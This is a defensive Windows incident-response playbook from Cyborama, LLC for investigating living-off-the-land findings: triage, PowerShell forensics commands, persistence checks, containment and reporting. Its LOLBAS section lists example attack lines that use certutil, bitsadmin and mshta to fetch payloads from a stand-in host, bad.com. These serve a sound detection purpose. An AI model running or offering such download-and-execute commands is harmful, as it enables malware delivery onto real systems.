# Investigation Playbook

## 🔍 How to Investigate LOTL Findings

### Investigation Framework
```
1. Triage (5 minutes) - Is this urgent?
2. Context (15 minutes) - What's happening?
3. Analysis (30+ minutes) - Is it malicious?
4. Response (Variable) - What to do?
5. Documentation (10 minutes) - What did we learn?
```

## 🚨 Triage Process (First 5 Minutes)

### Risk Assessment Matrix

| Risk Level | Color | Investigation Timeframe | Action Priority |
|------------|-------|------------------------|-----------------|
| **High** | 🔴 Red | Within 2 hours | Immediate |
| **Medium** | 🟡 Yellow | Within 24 hours | High |
| **Low** | 🟢 Green | Within 7 days | Medium |
| **Info** | 🔵 Blue | When convenient | Low |

### Quick Triage Questions
1. **Is this system critical?** (Domain controller, database, etc.)
2. **Is there active user impact?** (Performance issues, errors)
3. **Does this match known attack patterns?** (Check IOCs)
4. **Is this part of normal operations?** (Maintenance window, updates)

## 🔧 Investigation Toolkit

### Built-in Windows Tools
```powershell
# Process examination
Get-Process -Id <PID> | Select-Object *
Get-WmiObject Win32_Process | Where-Object { $_.ProcessId -eq <PID> }

# Network connections
Get-NetTCPConnection | Where-Object { $_.OwningProcess -eq <PID> }
netstat -ano | findstr <PID>

# File analysis
Get-Item -Path <FilePath> | Get-AuthenticodeSignature
Get-FileHash -Path <FilePath> -Algorithm SHA256

# Event logs
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4688} -MaxEvents 10
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'}
```

### Free Investigation Tools
- **Sysinternals Suite** (Process Explorer, Autoruns, TCPView)
- **Velociraptor** (advanced forensics)
- **Wireshark** (network analysis)
- **PEStudio** (malware analysis)
- **VirusTotal** (file reputation)

## 📋 Investigation by Finding Type

### 1. Encoded PowerShell Findings

#### What to Look For
- Base64-encoded commands (`-EncodedCommand`)
- `IEX` (Invoke-Expression) with download strings
- Obfuscated script blocks
- Unusual PowerShell hosts (not powershell.exe)

#### Investigation Steps
```powershell
# Decode the command
$encoded = "VwByAGkAdABlAC0ASABvAHMAdAAgACcAVABlAHMAdAAnAA=="
[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($encoded))

# Check PowerShell logs
Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" -MaxEvents 50 |
  Where-Object { $_.Message -like "*EncodedCommand*" }

# Look for persistence
Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -ErrorAction SilentlyContinue
Get-ScheduledTask | Where-Object { $_.TaskName -like "*PowerShell*" }
```

#### Common False Positives
- **Legitimate administrative scripts** (deployment, maintenance)
- **Security tools** (EDR, AV scans)
- **Software installation** (MSI packages)
- **Development tools** (VS Code, PowerShell ISE)

### 2. LOLBAS (Living Off The Land Binaries)

#### Common LOLBAS Binaries
- `certutil.exe` (download/encode files)
- `bitsadmin.exe` (download files)
- `mshta.exe` (execute HTML applications)
- `rundll32.exe` (execute DLL code)
- `wmic.exe` (WMI command execution)
- `regsvr32.exe` (register/execute DLLs)

#### Investigation Steps
```powershell
# Check process creation events
Get-WinEvent -FilterHashtable @{
    LogName='Security'
    ID=4688
    ProcessName='certutil.exe'
} -MaxEvents 10

# Examine command line arguments
# Suspicious patterns:
# certutil -urlcache -split -f http://bad.com/file.exe
# bitsadmin /transfer job /download /priority high http://bad.com/file.exe C:\temp\file.exe
# mshta http://bad.com/payload.hta
```

#### Legitimate Uses
- **certutil**: Certificate management, hash calculation
- **bitsadmin**: Windows Update, legitimate downloads
- **mshta**: Legacy HTML applications
- **rundll32**: Windows component loading

### 3. Scheduled Task Findings

#### Suspicious Patterns
- Tasks created via WMI (instead of schtasks)
- Tasks running as SYSTEM with unusual commands
- Tasks with encoded PowerShell
- Tasks with no description or author
- Tasks running from temp directories

#### Investigation Steps
```powershell
# Examine the task
Get-ScheduledTask -TaskName "SuspiciousTask" | Get-ScheduledTaskInfo
Export-ScheduledTask -TaskName "SuspiciousTask" | Out-File task.xml

# Check creation events
Get-WinEvent -FilterHashtable @{
    LogName='Security'
    ID=4698  # Scheduled task created
} -MaxEvents 20

# Look for WMI event consumers
Get-WmiObject -Namespace root\subscription -Class __EventConsumer
Get-WmiObject -Namespace root\subscription -Class __FilterToConsumerBinding
```

#### Legitimate Tasks
- **Windows maintenance** (defrag, cleanup)
- **Application updates** (Java, Adobe, browsers)
- **Backup software** (Veeam, Windows Backup)
- **Monitoring tools** (PRTG, Nagios)

### 4. Registry Persistence Findings

#### Common Locations
```
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKCU\Environment\UserInitMprLogonScript
```

#### Investigation Steps
```powershell
# Check registry values
Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -ErrorAction SilentlyContinue

# Monitor registry changes (real-time)
# Use ProcMon or built-in auditing

# Check for fileless persistence
Get-WmiObject -Namespace root\subscription -Class __EventFilter
Get-WmiObject -Namespace root\subscription -Class __EventConsumer
```

#### Legitimate Entries
- **Security software** (AV, EDR)
- **Driver utilities** (graphics, audio)
- **Cloud sync tools** (OneDrive, Dropbox)
- **Productivity software** (Office, Adobe)

## 🧪 Analysis Techniques

### Behavioral Analysis
1. **Is the behavior consistent with user/role?**
   - Developer running build scripts? ✓
   - CEO running PowerShell encoded commands? ✗

2. **Is the timing suspicious?**
   - 3 AM on a weekend? ✗
   - Business hours during maintenance window? ✓

3. **Is the source trustworthy?**
   - Internal IT server? ✓
   - Unknown external IP? ✗

### Technical Analysis
1. **File reputation check**
   - VirusTotal upload (hash check first)
   - Internal threat intelligence

2. **Network analysis**
   - Destination IP reputation
   - Port usage (common vs unusual)

3. **Process analysis**
   - Parent/child relationships
   - Memory usage patterns
   - Module loading

### Context Analysis
1. **Business context**
   - Recent software deployments?
   - IT projects in progress?
   - Known issues being worked?

2. **Threat context**
   - Current threat advisories?
   - Industry-specific targeting?
   - Geographic considerations?

## 🚒 Response Actions

### Containment (If Malicious)
```powershell
# Isolate system (network level)
Disable-NetAdapter -Name "Ethernet" -Confirm:$false

# Kill malicious process
Stop-Process -Id <PID> -Force

# Remove persistence
Remove-ItemProperty -Path "HKLM:\...\Run" -Name "MaliciousEntry"
Unregister-ScheduledTask -TaskName "MaliciousTask" -Confirm:$false

# Preserve evidence
Copy-Item -Path <MaliciousFile> -Destination <EvidenceFolder>
Get-Process -Id <PID> | Export-Clixml process_info.xml
```

### Eradication
1. **Remove all malicious artifacts**
   - Files, registry entries, scheduled tasks
   - WMI event consumers
   - User accounts created

2. **Patch vulnerabilities**
   - Update software
   - Apply security patches
   - Harden configurations

3. **Change credentials**
   - User passwords
   - Service accounts
   - API keys

### Recovery
1. **Restore from backup** (if necessary)
2. **Validate system integrity**
3. **Monitor for re-infection**
4. **Update detection rules**

## 📝 Documentation Requirements

### Investigation Log
```
Date/Time: 2026-02-27 14:30 UTC
Investigator: John Doe
Finding ID: LOTL-2026-027-001
System: WORKSTATION-01
Risk: High

Timeline:
14:30 - Alert received
14:32 - System isolated
14:35 - Process analysis began
14:45 - Determined malicious
14:50 - Remediation started
15:00 - Cleanup complete

Evidence Collected:
- Process memory dump: PID_1234.dmp
- Malicious file: C:\temp\payload.exe
- Network logs: netstat_output.txt

Root Cause: Phishing email with malicious attachment
Remediation: Removed file, reset user password, updated email filter
Lessons Learned: Need better email security training
```

### Post-Incident Report
1. **Executive Summary** (1 page, non-technical)
2. **Technical Details** (what happened, how)
3. **Impact Assessment** (data, systems, time)
4. **Root Cause Analysis** (why it happened)
5. **Remediation Actions** (what was done)
6. **Recommendations** (how to prevent recurrence)
7. **Appendices** (evidence, logs, IOCs)

## 🔄 Continuous Improvement

### After Each Investigation
- [ ] **Update detection rules** (if false positive/negative)
- [ ] **Share IOCs** with team/community
- [ ] **Document new techniques** learned
- [ ] **Update playbook** with new procedures
- [ ] **Train team members** on findings

### Monthly Review
- [ ] **Analyze investigation trends**
- [ ] **Update tooling** based on needs
- [ ] **Review and update playbooks**
- [ ] **Cross-train team members**
- [ ] **Test investigation procedures**

### Quarterly Drills
- [ ] **Tabletop exercises** with team
- [ ] **Red team simulations**
- [ ] **Tool validation** (are tools still working?)
- [ ] **Process review** (are procedures followed?)
- [ ] **Skill assessment** (training needs)

## 🆘 When to Escalate

### Escalate to Security Team When:
- **Multiple systems affected**
- **Data exfiltration suspected**
- **Critical systems compromised**
- **Unknown malware involved**
- **Legal/regulatory implications**

### Escalate to Management When:
- **Business operations impacted**
- **Customer data potentially exposed**
- **Media attention possible**
- **Financial impact significant**
- **Strategic decisions needed**

### External Assistance When:
- **Advanced persistent threat suspected**
- **Specialized forensics needed**
- **Legal investigation required**
- **Industry collaboration beneficial**
- **Vendor support needed**

---

**Remember:** Investigation is both art and science. Experience builds intuition, but always follow the process.

**Cyborama, LLC – "Threat Intelligence with Teeth™"**